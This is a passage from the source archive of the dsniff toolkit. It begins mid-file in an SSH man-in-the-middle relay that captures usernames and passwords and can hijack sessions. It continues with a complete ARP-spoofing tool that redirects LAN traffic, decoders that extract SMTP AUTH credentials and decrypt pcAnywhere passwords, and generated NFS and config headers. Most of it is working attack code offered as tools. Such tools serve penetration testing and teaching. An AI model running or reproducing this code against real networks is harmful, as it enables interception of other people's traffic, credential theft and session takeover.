SSH_new(ssh_client_ctx)) == NULL) err(1, "malloc"); SSH_set_fd(ssh_client, client_fd); if (SSH_accept(ssh_client) == -1) errx(1, "client key exchange failed"); /* Relay username. */ if ((i = SSH_recv(ssh_client, buf, sizeof(buf))) <= 0 || buf[0] != SSH_CMSG_USER) errx(1, "couldn't get username"); userpass[0] = '\0'; ssh_strlcat(userpass, sizeof(userpass), buf + 1, i - 1); strlcat(userpass, "\n", sizeof(userpass)); if (SSH_send(ssh_server, buf, i) != i) errx(1, "couldn't relay username"); pass_done = hijack_done = 0; /* Relay packets. */ for (;;) { FD_ZERO(&fds); FD_SET(server_fd, &fds); i = server_fd; if (Opt_interact) { FD_SET(STDIN_FILENO, &fds); } if (!hijack_done) { FD_SET(client_fd, &fds); i = MAX(client_fd, i); } if (select(i + 1, &fds, 0, 0, 0) == -1) { if (errno != EINTR) break; } if (FD_ISSET(client_fd, &fds)) { i = sizeof(buf); if ((i = SSH_recv(ssh_client, buf, i)) <= 0) break; if (!pass_done) { if (buf[0] == SSH_CMSG_AUTH_PASSWORD) { ssh_strlcat(userpass, sizeof(userpass), buf + 1, i - 1); strlcat(userpass, "\n", sizeof(userpass)); } else { pass_done = 1; record(csin.sin_addr.s_addr, ssin.sin_addr.s_addr, IPPROTO_TCP, ntohs(csin.sin_port), ntohs(ssin.sin_port), "ssh", userpass, strlen(userpass)); } } if (SSH_send(ssh_server, buf, i) != i) break; } else if (FD_ISSET(server_fd, &fds)) { i = sizeof(buf); if ((i = SSH_recv(ssh_server, buf, i)) <= 0) break; if (Opt_interact) { if (buf[0] == SSH_SMSG_STDOUT_DATA && write(STDOUT_FILENO, buf + 5, i - 5) <= 0) { break; } else if (buf[0] == SSH_SMSG_STDERR_DATA && write(STDOUT_FILENO, buf + 5, i - 5) <= 0) { break; } else if (buf[0] == SSH_SMSG_EXITSTATUS || buf[0] == SSH_MSG_DISCONNECT) { warnx("connection closed"); break; } } if (!hijack_done) { if (SSH_send(ssh_client, buf, i) != i) break; } } else if (FD_ISSET(STDIN_FILENO, &fds)) { i = sizeof(buf) - 1; if ((i = read(STDIN_FILENO, buf + 5, i - 5)) <= 0) break; *(u_int32_t *)(buf + 1) = htonl(i); buf[0] = SSH_CMSG_STDIN_DATA; i += 5; if (SSH_send(ssh_server, buf, i) != i) break; /* Let the real client hang on connection hijack. */ if (!hijack_done) { fprintf(stderr, "[connection hijacked]\n"); hijack_done = 1; } } else err(1, "select"); } SSH_close(ssh_server); SSH_close(ssh_client); } static void mitm_run(void) { u_char buf[8192]; fd_set fds; int i; signal(SIGCHLD, sig_chld); signal(SIGINT, sig_int); if (fcntl(sig_pipe[0], F_SETFL, O_NONBLOCK) == -1 || fcntl(sig_pipe[1], F_SETFL, O_NONBLOCK) == -1) err(1, "fcntl"); if (fcntl(mitm_fd, F_SETFL, O_NONBLOCK) == -1) err(1, "fcntl"); for (;;) { FD_ZERO(&fds); FD_SET(mitm_fd, &fds); FD_SET(sig_pipe[0], &fds); i = MAX(mitm_fd, sig_pipe[0]); if (select(i + 1, &fds, 0, 0, 0) == -1) { if (errno != EINTR) err(1, "select"); } i = sizeof(csin); if (FD_ISSET(sig_pipe[0], &fds)) { while (read(sig_pipe[0], buf, 1) == 1) ; /* empty non-blocking pipe */ reap_child(); } if (FD_ISSET(mitm_fd, &fds)) { client_fd = accept(mitm_fd, (struct sockaddr *)&csin, &i); if (client_fd >= 0) { if (fork() == 0) { close(mitm_fd); mitm_child(); exit(0); } close(client_fd); } else if (errno != EINTR && errno != EWOULDBLOCK) { err(1, "accept"); } } } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; u_long ip; u_short lport, rport; int c; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; lport = rport = 22; while ((c = getopt(argc, argv, "dIp:h?V")) != -1) { switch (c) { case 'd': Opt_debug = 1; break; case 'I': Opt_interact = 1; break; case 'p': if ((lport = atoi(optarg)) == 0) usage(); break; default: usage(); break; } } argc -= optind; argv += optind; if (argc < 1) usage(); if (argc == 2 && (rport = atoi(argv[1])) == 0) usage(); if ((l = libnet_init(LIBNET_LINK, NULL, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); if ((ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) usage(); record_init(NULL); mitm_init(lport, ip, rport); warnx("relaying to %s", argv[0]); mitm_run(); exit(0); } hackerschoice-dsniff-a17510d/nfs_prot.h0000664000175000017500000002726515105626144020031 0ustar epsilonepsilon/* * Please do not edit this file. * It was generated using rpcgen. */ #ifndef _NFS_PROT_H_RPCGEN #define _NFS_PROT_H_RPCGEN #include #ifdef __cplusplus extern "C" { #endif #include "config.h" #define NFS_PORT 2049 #define NFS_MAXDATA 8192 #define NFS_MAXPATHLEN 1024 #define NFS_MAXNAMLEN 255 #define NFS_FHSIZE 32 #define NFS_COOKIESIZE 4 #define NFS_FIFO_DEV -1 #define NFSMODE_FMT 0170000 #define NFSMODE_DIR 0040000 #define NFSMODE_CHR 0020000 #define NFSMODE_BLK 0060000 #define NFSMODE_REG 0100000 #define NFSMODE_LNK 0120000 #define NFSMODE_SOCK 0140000 #define NFSMODE_FIFO 0010000 enum nfsstat { NFS_OK = 0, NFSERR_PERM = 1, NFSERR_NOENT = 2, NFSERR_IO = 5, NFSERR_NXIO = 6, NFSERR_ACCES = 13, NFSERR_EXIST = 17, NFSERR_XDEV = 18, NFSERR_NODEV = 19, NFSERR_NOTDIR = 20, NFSERR_ISDIR = 21, NFSERR_INVAL = 22, NFSERR_FBIG = 27, NFSERR_NOSPC = 28, NFSERR_ROFS = 30, NFSERR_OPNOTSUPP = 45, NFSERR_NAMETOOLONG = 63, NFSERR_NOTEMPTY = 66, NFSERR_DQUOT = 69, NFSERR_STALE = 70, NFSERR_REMOTE = 71, NFSERR_WFLUSH = 72, }; typedef enum nfsstat nfsstat; enum ftype { NFNON = 0, NFREG = 1, NFDIR = 2, NFBLK = 3, NFCHR = 4, NFLNK = 5, NFSOCK = 6, NFBAD = 7, NFFIFO = 8, }; typedef enum ftype ftype; struct nfs_fh { char data[NFS_FHSIZE]; }; typedef struct nfs_fh nfs_fh; struct nfstime { u_int seconds; u_int useconds; }; typedef struct nfstime nfstime; struct fattr { ftype type; u_int mode; u_int nlink; u_int uid; u_int gid; u_int size; u_int blocksize; u_int rdev; u_int blocks; u_int fsid; u_int fileid; nfstime atime; nfstime mtime; nfstime ctime; }; typedef struct fattr fattr; typedef char *filename; typedef char *nfspath; struct diropargs { nfs_fh dir; filename name; }; typedef struct diropargs diropargs; struct diropokres { nfs_fh file; fattr attributes; }; typedef struct diropokres diropokres; struct diropres { nfsstat status; union { diropokres diropres; } diropres_u; }; typedef struct diropres diropres; struct readargs { nfs_fh file; u_int offset; u_int count; u_int totalcount; }; typedef struct readargs readargs; struct readokres { fattr attributes; struct { u_int data_len; char *data_val; } data; }; typedef struct readokres readokres; struct readres { nfsstat status; union { readokres reply; } readres_u; }; typedef struct readres readres; #define NFS3_FHSIZE 64 #define NFS3_COOKIEVERFSIZE 8 #define NFS3_CREATEVERFSIZE 8 #define NFS3_WRITEVERFSIZE 8 typedef uint64_t uint64; typedef int64_t int64; typedef u_int uint32; typedef int int32; typedef char *filename3; typedef char *nfspath3; typedef uint64 fileid3; typedef uint64 cookie3; typedef char cookieverf3[NFS3_COOKIEVERFSIZE]; typedef char createverf3[NFS3_CREATEVERFSIZE]; typedef char writeverf3[NFS3_WRITEVERFSIZE]; typedef uint32 uid3; typedef uint32 gid3; typedef uint64 size3; typedef uint64 offset3; typedef uint32 mode3; typedef uint32 count3; enum nfsstat3 { NFS3_OK = 0, NFS3ERR_PERM = 1, NFS3ERR_NOENT = 2, NFS3ERR_IO = 5, NFS3ERR_NXIO = 6, NFS3ERR_ACCES = 13, NFS3ERR_EXIST = 17, NFS3ERR_XDEV = 18, NFS3ERR_NODEV = 19, NFS3ERR_NOTDIR = 20, NFS3ERR_ISDIR = 21, NFS3ERR_INVAL = 22, NFS3ERR_FBIG = 27, NFS3ERR_NOSPC = 28, NFS3ERR_ROFS = 30, NFS3ERR_MLINK = 31, NFS3ERR_NAMETOOLONG = 63, NFS3ERR_NOTEMPTY = 66, NFS3ERR_DQUOT = 69, NFS3ERR_STALE = 70, NFS3ERR_REMOTE = 71, NFS3ERR_BADHANDLE = 10001, NFS3ERR_NOT_SYNC = 10002, NFS3ERR_BAD_COOKIE = 10003, NFS3ERR_NOTSUPP = 10004, NFS3ERR_TOOSMALL = 10005, NFS3ERR_SERVERFAULT = 10006, NFS3ERR_BADTYPE = 10007, NFS3ERR_JUKEBOX = 10008, }; typedef enum nfsstat3 nfsstat3; enum ftype3 { NF3REG = 1, NF3DIR = 2, NF3BLK = 3, NF3CHR = 4, NF3LNK = 5, NF3SOCK = 6, NF3FIFO = 7, }; typedef enum ftype3 ftype3; struct specdata3 { uint32 specdata1; uint32 specdata2; }; typedef struct specdata3 specdata3; struct nfs_fh3 { struct { u_int data_len; char *data_val; } data; }; typedef struct nfs_fh3 nfs_fh3; struct nfstime3 { uint32 seconds; uint32 nseconds; }; typedef struct nfstime3 nfstime3; struct fattr3 { ftype3 type; mode3 mode; uint32 nlink; uid3 uid; gid3 gid; size3 size; size3 used; specdata3 rdev; uint64 fsid; fileid3 fileid; nfstime3 atime; nfstime3 mtime; nfstime3 ctime; }; typedef struct fattr3 fattr3; struct post_op_attr { bool_t attributes_follow; union { fattr3 attributes; } post_op_attr_u; }; typedef struct post_op_attr post_op_attr; struct wcc_attr { size3 size; nfstime3 mtime; nfstime3 ctime; }; typedef struct wcc_attr wcc_attr; struct pre_op_attr { bool_t attributes_follow; union { wcc_attr attributes; } pre_op_attr_u; }; typedef struct pre_op_attr pre_op_attr; struct wcc_data { pre_op_attr before; post_op_attr after; }; typedef struct wcc_data wcc_data; struct diropargs3 { nfs_fh3 dir; filename3 name; }; typedef struct diropargs3 diropargs3; struct LOOKUP3args { diropargs3 what; }; typedef struct LOOKUP3args LOOKUP3args; struct LOOKUP3resok { nfs_fh3 object; post_op_attr obj_attributes; post_op_attr dir_attributes; }; typedef struct LOOKUP3resok LOOKUP3resok; struct LOOKUP3resfail { post_op_attr dir_attributes; }; typedef struct LOOKUP3resfail LOOKUP3resfail; struct LOOKUP3res { nfsstat3 status; union { LOOKUP3resok resok; LOOKUP3resfail resfail; } LOOKUP3res_u; }; typedef struct LOOKUP3res LOOKUP3res; struct READ3args { nfs_fh3 file; offset3 offset; count3 count; }; typedef struct READ3args READ3args; struct READ3resok { post_op_attr file_attributes; count3 count; bool_t eof; struct { u_int data_len; char *data_val; } data; }; typedef struct READ3resok READ3resok; struct READ3resfail { post_op_attr file_attributes; }; typedef struct READ3resfail READ3resfail; struct READ3res { nfsstat status; union { READ3resok resok; READ3resfail resfail; } READ3res_u; }; typedef struct READ3res READ3res; #define NFS_PROGRAM 100003 #define NFS_VERSION 2 #if defined(__STDC__) || defined(__cplusplus) #define NFSPROC_NULL 0 extern void * nfsproc_null_2(void *, CLIENT *); extern void * nfsproc_null_2_svc(void *, struct svc_req *); #define NFSPROC_LOOKUP 4 extern diropres * nfsproc_lookup_2(diropargs *, CLIENT *); extern diropres * nfsproc_lookup_2_svc(diropargs *, struct svc_req *); #define NFSPROC_READ 6 extern readres * nfsproc_read_2(readargs *, CLIENT *); extern readres * nfsproc_read_2_svc(readargs *, struct svc_req *); extern int nfs_program_2_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ #define NFSPROC_NULL 0 extern void * nfsproc_null_2(); extern void * nfsproc_null_2_svc(); #define NFSPROC_LOOKUP 4 extern diropres * nfsproc_lookup_2(); extern diropres * nfsproc_lookup_2_svc(); #define NFSPROC_READ 6 extern readres * nfsproc_read_2(); extern readres * nfsproc_read_2_svc(); extern int nfs_program_2_freeresult (); #endif /* K&R C */ #define NFS3_PROGRAM 100003 #define NFS_V3 3 #if defined(__STDC__) || defined(__cplusplus) #define NFSPROC3_NULL 0 extern void * nfsproc3_null_3(void *, CLIENT *); extern void * nfsproc3_null_3_svc(void *, struct svc_req *); #define NFSPROC3_LOOKUP 3 extern LOOKUP3res * nfsproc3_lookup_3(LOOKUP3args *, CLIENT *); extern LOOKUP3res * nfsproc3_lookup_3_svc(LOOKUP3args *, struct svc_req *); #define NFSPROC3_READ 6 extern READ3res * nfsproc3_read_3(READ3args *, CLIENT *); extern READ3res * nfsproc3_read_3_svc(READ3args *, struct svc_req *); extern int nfs3_program_3_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ #define NFSPROC3_NULL 0 extern void * nfsproc3_null_3(); extern void * nfsproc3_null_3_svc(); #define NFSPROC3_LOOKUP 3 extern LOOKUP3res * nfsproc3_lookup_3(); extern LOOKUP3res * nfsproc3_lookup_3_svc(); #define NFSPROC3_READ 6 extern READ3res * nfsproc3_read_3(); extern READ3res * nfsproc3_read_3_svc(); extern int nfs3_program_3_freeresult (); #endif /* K&R C */ /* the xdr functions */ #if defined(__STDC__) || defined(__cplusplus) extern bool_t xdr_nfsstat (XDR *, nfsstat*); extern bool_t xdr_ftype (XDR *, ftype*); extern bool_t xdr_nfs_fh (XDR *, nfs_fh*); extern bool_t xdr_nfstime (XDR *, nfstime*); extern bool_t xdr_fattr (XDR *, fattr*); extern bool_t xdr_filename (XDR *, filename*); extern bool_t xdr_nfspath (XDR *, nfspath*); extern bool_t xdr_diropargs (XDR *, diropargs*); extern bool_t xdr_diropokres (XDR *, diropokres*); extern bool_t xdr_diropres (XDR *, diropres*); extern bool_t xdr_readargs (XDR *, readargs*); extern bool_t xdr_readokres (XDR *, readokres*); extern bool_t xdr_readres (XDR *, readres*); extern bool_t xdr_uint64 (XDR *, uint64*); extern bool_t xdr_int64 (XDR *, int64*); extern bool_t xdr_uint32 (XDR *, uint32*); extern bool_t xdr_int32 (XDR *, int32*); extern bool_t xdr_filename3 (XDR *, filename3*); extern bool_t xdr_nfspath3 (XDR *, nfspath3*); extern bool_t xdr_fileid3 (XDR *, fileid3*); extern bool_t xdr_cookie3 (XDR *, cookie3*); extern bool_t xdr_cookieverf3 (XDR *, cookieverf3); extern bool_t xdr_createverf3 (XDR *, createverf3); extern bool_t xdr_writeverf3 (XDR *, writeverf3); extern bool_t xdr_uid3 (XDR *, uid3*); extern bool_t xdr_gid3 (XDR *, gid3*); extern bool_t xdr_size3 (XDR *, size3*); extern bool_t xdr_offset3 (XDR *, offset3*); extern bool_t xdr_mode3 (XDR *, mode3*); extern bool_t xdr_count3 (XDR *, count3*); extern bool_t xdr_nfsstat3 (XDR *, nfsstat3*); extern bool_t xdr_ftype3 (XDR *, ftype3*); extern bool_t xdr_specdata3 (XDR *, specdata3*); extern bool_t xdr_nfs_fh3 (XDR *, nfs_fh3*); extern bool_t xdr_nfstime3 (XDR *, nfstime3*); extern bool_t xdr_fattr3 (XDR *, fattr3*); extern bool_t xdr_post_op_attr (XDR *, post_op_attr*); extern bool_t xdr_wcc_attr (XDR *, wcc_attr*); extern bool_t xdr_pre_op_attr (XDR *, pre_op_attr*); extern bool_t xdr_wcc_data (XDR *, wcc_data*); extern bool_t xdr_diropargs3 (XDR *, diropargs3*); extern bool_t xdr_LOOKUP3args (XDR *, LOOKUP3args*); extern bool_t xdr_LOOKUP3resok (XDR *, LOOKUP3resok*); extern bool_t xdr_LOOKUP3resfail (XDR *, LOOKUP3resfail*); extern bool_t xdr_LOOKUP3res (XDR *, LOOKUP3res*); extern bool_t xdr_READ3args (XDR *, READ3args*); extern bool_t xdr_READ3resok (XDR *, READ3resok*); extern bool_t xdr_READ3resfail (XDR *, READ3resfail*); extern bool_t xdr_READ3res (XDR *, READ3res*); #else /* K&R C */ extern bool_t xdr_nfsstat (); extern bool_t xdr_ftype (); extern bool_t xdr_nfs_fh (); extern bool_t xdr_nfstime (); extern bool_t xdr_fattr (); extern bool_t xdr_filename (); extern bool_t xdr_nfspath (); extern bool_t xdr_diropargs (); extern bool_t xdr_diropokres (); extern bool_t xdr_diropres (); extern bool_t xdr_readargs (); extern bool_t xdr_readokres (); extern bool_t xdr_readres (); extern bool_t xdr_uint64 (); extern bool_t xdr_int64 (); extern bool_t xdr_uint32 (); extern bool_t xdr_int32 (); extern bool_t xdr_filename3 (); extern bool_t xdr_nfspath3 (); extern bool_t xdr_fileid3 (); extern bool_t xdr_cookie3 (); extern bool_t xdr_cookieverf3 (); extern bool_t xdr_createverf3 (); extern bool_t xdr_writeverf3 (); extern bool_t xdr_uid3 (); extern bool_t xdr_gid3 (); extern bool_t xdr_size3 (); extern bool_t xdr_offset3 (); extern bool_t xdr_mode3 (); extern bool_t xdr_count3 (); extern bool_t xdr_nfsstat3 (); extern bool_t xdr_ftype3 (); extern bool_t xdr_specdata3 (); extern bool_t xdr_nfs_fh3 (); extern bool_t xdr_nfstime3 (); extern bool_t xdr_fattr3 (); extern bool_t xdr_post_op_attr (); extern bool_t xdr_wcc_attr (); extern bool_t xdr_pre_op_attr (); extern bool_t xdr_wcc_data (); extern bool_t xdr_diropargs3 (); extern bool_t xdr_LOOKUP3args (); extern bool_t xdr_LOOKUP3resok (); extern bool_t xdr_LOOKUP3resfail (); extern bool_t xdr_LOOKUP3res (); extern bool_t xdr_READ3args (); extern bool_t xdr_READ3resok (); extern bool_t xdr_READ3resfail (); extern bool_t xdr_READ3res (); #endif /* K&R C */ #ifdef __cplusplus } #endif #endif /* !_NFS_PROT_H_RPCGEN */ hackerschoice-dsniff-a17510d/decode_smtp.c0000664000175000017500000000302615105626144020445 0ustar epsilonepsilon/* * decode_smtp.c * * Simple Mail Transfer Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_smtp.c,v 1.3 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "base64.h" #include "options.h" #include "decode.h" extern struct _dc_meta dc_meta; int decode_smtp(u_char *buf, int len, u_char *obuf, int olen) { char *p, *s; int i, j, login = 0; int found = 0; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if ((strncmp(p, "MAIL ", 5) == 0) || (strncmp(p, "RCPT ", 5) == 0)) { if (!Opt_verbose) break; if (obuf[0] != '\0') strlcat(obuf, "\n", olen); strlcat(obuf, p+5, olen); if (++found >= 2) break; continue; } if ((strncmp(p, "DATA", 4) == 0) || (strncmp(p, "QUIT", 4) == 0)) break; if (login == 0) { if (strncmp(p, "AUTH LOGIN", 10) != 0) continue; strlcat(obuf, p, olen); p += 10; i = base64_pton(p, p, strlen(p)); if (i > 0) { p[i] = '\0'; j = strlen(obuf); snprintf(obuf + j, olen - j, " [%s]", p); } else { strlcat(obuf, " ", olen); login = 1; } dc_meta.is_hot = 1; continue; } strlcat(obuf, p, olen); // USER: // PASS: // if ((s = strchr(p, ' ')) != NULL) p = ++s; i = base64_pton(p, p, strlen(p)); if (i > 0) { p[i] = '\0'; j = strlen(obuf); snprintf(obuf + j, olen - j, " [%s] ", p); } } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/arpspoof.c0000664000175000017500000001572215105626144020016 0ustar epsilonepsilon/* * arpspoof.c * * Redirect packets from a target host (or from all hosts) intended for * another host on the LAN to ourselves. * * Copyright (c) 1999 Dug Song * * $Id: arpspoof.c,v 1.5 2001/03/15 08:32:58 dugsong Exp $ * * Improved 2011 by Stefan Tomanek */ #include "config.h" #include #include #include #ifdef __FreeBSD__ #include #endif #include #include #include #include #include #include #include #include #include "arp.h" extern char *ether_ntoa(struct ether_addr *); struct host { in_addr_t ip; struct ether_addr mac; }; static libnet_t *l; static struct host spoof = {0}; static struct host *targets; static char *intf; static int poison_reverse; static uint8_t *my_ha = NULL; static uint8_t *brd_ha = "\xff\xff\xff\xff\xff\xff"; static int cleanup_src_own = 1; static int cleanup_src_host = 0; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host\n"); exit(1); } static int arp_send(libnet_t *l, int op, u_int8_t *sha, in_addr_t spa, u_int8_t *tha, in_addr_t tpa, u_int8_t *me) { int retval; if (!me) me = sha; libnet_autobuild_arp(op, sha, (u_int8_t *)&spa, tha, (u_int8_t *)&tpa, l); libnet_build_ethernet(tha, me, ETHERTYPE_ARP, NULL, 0, l, 0); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)me)); if (op == ARPOP_REQUEST) { fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(tpa, LIBNET_DONT_RESOLVE), libnet_addr2name4(spa, LIBNET_DONT_RESOLVE)); } else { fprintf(stderr, "%s 0806 42: arp reply %s is-at ", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(spa, LIBNET_DONT_RESOLVE)); fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)sha)); } retval = libnet_write(l); if (retval) fprintf(stderr, "%s", libnet_geterror(l)); libnet_clear_packet(l); return retval; } #ifdef __linux__ static int arp_force(in_addr_t dst) { struct sockaddr_in sin; int i, fd; if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) return (0); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = dst; sin.sin_port = htons(67); i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin)); close(fd); return (i == 0); } #endif static int arp_find(in_addr_t ip, struct ether_addr *mac) { int i = 0; do { if (arp_cache_lookup(ip, mac, intf) == 0) return (1); #ifdef __linux__ /* XXX - force the kernel to arp. feh. */ arp_force(ip); #else arp_send(l, ARPOP_REQUEST, NULL, 0, NULL, ip, NULL); #endif sleep(1); } while (i++ < 3); return (0); } static int arp_find_all() { struct host *target = targets; while(target->ip) { if (arp_find(target->ip, &target->mac)) { return 1; } target++; } return 0; } static void cleanup(int sig) { int fw = arp_find(spoof.ip, &spoof.mac); int bw = poison_reverse && targets[0].ip && arp_find_all(); int i; int rounds = (cleanup_src_own*5 + cleanup_src_host*5); fprintf(stderr, "Cleaning up and re-arping targets...\n"); for (i = 0; i < rounds; i++) { struct host *target = targets; while(target->ip) { uint8_t *src_ha = NULL; if (cleanup_src_own && (i%2 || !cleanup_src_host)) { src_ha = my_ha; } /* XXX - on BSD, requires ETHERSPOOF kernel. */ if (fw) { arp_send(l, ARPOP_REPLY, (u_int8_t *)&spoof.mac, spoof.ip, (target->ip ? (u_int8_t *)&target->mac : brd_ha), target->ip, src_ha); /* we have to wait a moment before sending the next packet */ sleep(1); } if (bw) { arp_send(l, ARPOP_REPLY, (u_int8_t *)&target->mac, target->ip, (u_int8_t *)&spoof.mac, spoof.ip, src_ha); sleep(1); } target++; } } exit(0); } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char pcap_ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; int c; int n_targets; char *cleanup_src = NULL; spoof.ip = 0; intf = NULL; poison_reverse = 0; n_targets = 0; /* allocate enough memory for target list */ targets = calloc( argc+1, sizeof(struct host) ); if ((l = libnet_init(LIBNET_LINK, NULL, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); while ((c = getopt(argc, argv, "ri:t:c:h?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case 't': if ((targets[n_targets++].ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) usage(); break; case 'r': poison_reverse = 1; break; case 'c': cleanup_src = optarg; break; default: usage(); } } argc -= optind; argv += optind; if (argc != 1) usage(); if (poison_reverse && !n_targets) { errx(1, "Spoofing the reverse path (-r) is only available when specifying a target (-t)."); usage(); } if (!cleanup_src || strcmp(cleanup_src, "own")==0) { /* default! */ /* only use our own hw address when cleaning up, * not jeopardizing any bridges on the way to our * target */ cleanup_src_own = 1; cleanup_src_host = 0; } else if (strcmp(cleanup_src, "host")==0) { /* only use the target hw address when cleaning up; * this can screw up some bridges and scramble access * for our own host, however it resets the arp table * more reliably */ cleanup_src_own = 0; cleanup_src_host = 1; } else if (strcmp(cleanup_src, "both")==0) { cleanup_src_own = 1; cleanup_src_host = 1; } else { errx(1, "Invalid parameter to -c: use 'own' (default), 'host' or 'both'."); usage(); } if ((spoof.ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) usage(); libnet_destroy(l); if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL) errx(1, "%s", pcap_ebuf); if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); struct host *target = targets; while(target->ip) { if (target->ip != 0 && !arp_find(target->ip, &target->mac)) errx(1, "couldn't arp for host %s", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE)); target++; } if (poison_reverse) { if (!arp_find(spoof.ip, &spoof.mac)) { errx(1, "couldn't arp for spoof host %s", libnet_addr2name4(spoof.ip, LIBNET_DONT_RESOLVE)); } } if ((my_ha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) { errx(1, "Unable to determine own mac address"); } signal(SIGHUP, cleanup); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); for (;;) { if (!n_targets) { arp_send(l, ARPOP_REPLY, my_ha, spoof.ip, brd_ha, 0, my_ha); } else { struct host *target = targets; while(target->ip) { arp_send(l, ARPOP_REPLY, my_ha, spoof.ip, (target->ip ? (u_int8_t *)&target->mac : brd_ha), target->ip, my_ha); if (poison_reverse) { arp_send(l, ARPOP_REPLY, my_ha, target->ip, (uint8_t *)&spoof.mac, spoof.ip, my_ha); } target++; } } sleep(2); } /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/decode_pcanywhere.c0000664000175000017500000000321315105626144021625 0ustar epsilonepsilon/* * decode_pcanywhere.c * * Symantec pcAnywhere. * * Thanks to Pascal Longpre for his BUGTRAQ post * on pcAnywhere encryption, and for providing me with traffic traces. * * Copyright (c) 2000 Dug Song * * $Id: decode_pcanywhere.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" int decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen) { struct buf *word, inbuf, outbuf; u_char *p, c; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); /* Skip leading zero bytes. */ while (buf_get(&inbuf, &c, 1) == 1) { if (c != 0) break; } /* Version 7, no encryption */ if (c < 0x0f && c != 0x06 /* jic */) { while ((word = buf_tok(&inbuf, "\r", 1)) != NULL) { if (buf_ptr(word)[0] == 0x6f) break; buf_putf(&outbuf, "%.*s\n", buf_len(word), buf_ptr(word)); } } /* Version 9, encrypted */ else { /* Skip optional \x6f command packets. */ while ((i = buf_index(&inbuf, "\x06", 1)) >= 0) { buf_skip(&inbuf, i); if (buf_len(&inbuf) > 2 && buf_ptr(&inbuf)[1] != 0xff) break; buf_skip(&inbuf, 2); } /* Parse \x06 auth packets. */ while (buf_cmp(&inbuf, "\x06", 1) == 0) { buf_skip(&inbuf, 1); if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; p = buf_ptr(&inbuf); buf_skip(&inbuf, c); for (i = c - 1; i > 0; i--) { p[i] = p[i - 1] ^ p[i] ^ (i - 1); } p[0] ^= 0xab; buf_putf(&outbuf, "%.*s\n", c, p); } } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/tcp_raw.h0000664000175000017500000000106615105626144017625 0ustar epsilonepsilon/* * tcp_raw.h * * Raw (best-effort, half-duplex) TCP reassembly. Haaacccck. * * Copyright (c) 2000 Dug Song * * $Id: tcp_raw.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef TCP_RAW_H #define TCP_RAW_H typedef void (*tcp_raw_callback_t)(in_addr_t src, in_addr_t dst, u_short sport, u_short dport, u_char *buf, int len); struct iovec *tcp_raw_input(struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp, int len); void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback); #endif /* TCP_RAW_H */ hackerschoice-dsniff-a17510d/config.h.in0000664000175000017500000000533615105626144020044 0ustar epsilonepsilon/* config.h.in. Generated automatically from configure.in by autoheader. */ /* Define to empty if the keyword does not work. */ #undef const /* Define if you have the strftime function. */ #undef HAVE_STRFTIME /* Define as the return type of signal handlers (int or void). */ #undef RETSIGTYPE /* Define to `unsigned' if doesn't define. */ #undef size_t /* Define if you have the ANSI C header files. */ #undef STDC_HEADERS /* Define if your declares struct tm. */ #undef TM_IN_SYS_TIME /* Define if the X Window System is missing or not being used. */ #undef X_DISPLAY_MISSING /* Define to 'uint32_t' if doesn't define. */ #undef u_int32_t /* Define to 'uint64_t' if doesn't define. */ #undef u_int64_t /* Define to 'u_int32_t' if doesn't define. */ #undef in_addr_t /* Define if you have the header file. */ #undef HAVE_DB_H /* Define if you have the header file. */ #undef HAVE_DB_185_H /* Should be in , *sigh* */ #undef HAVE_MINMAX #ifndef HAVE_MINMAX #define MIN(a,b) (((a)<(b))?(a):(b)) #define MAX(a,b) (((a)>(b))?(a):(b)) #endif /* Define if you have the MD5Update function. */ #undef HAVE_MD5UPDATE /* Define if you have the dirname function. */ #undef HAVE_DIRNAME /* Define if you have the ether_ntoa function. */ #undef HAVE_ETHER_NTOA /* Define if you have the gethostname function. */ #undef HAVE_GETHOSTNAME /* Define if you have the socket function. */ #undef HAVE_SOCKET /* Define if you have the strdup function. */ #undef HAVE_STRDUP /* Define if you have the strlcat function. */ #undef HAVE_STRLCAT /* Define if you have the strlcpy function. */ #undef HAVE_STRLCPY /* Define if you have the strsep function. */ #undef HAVE_STRSEP /* Define if you have the strstr function. */ #undef HAVE_STRSTR /* Define if 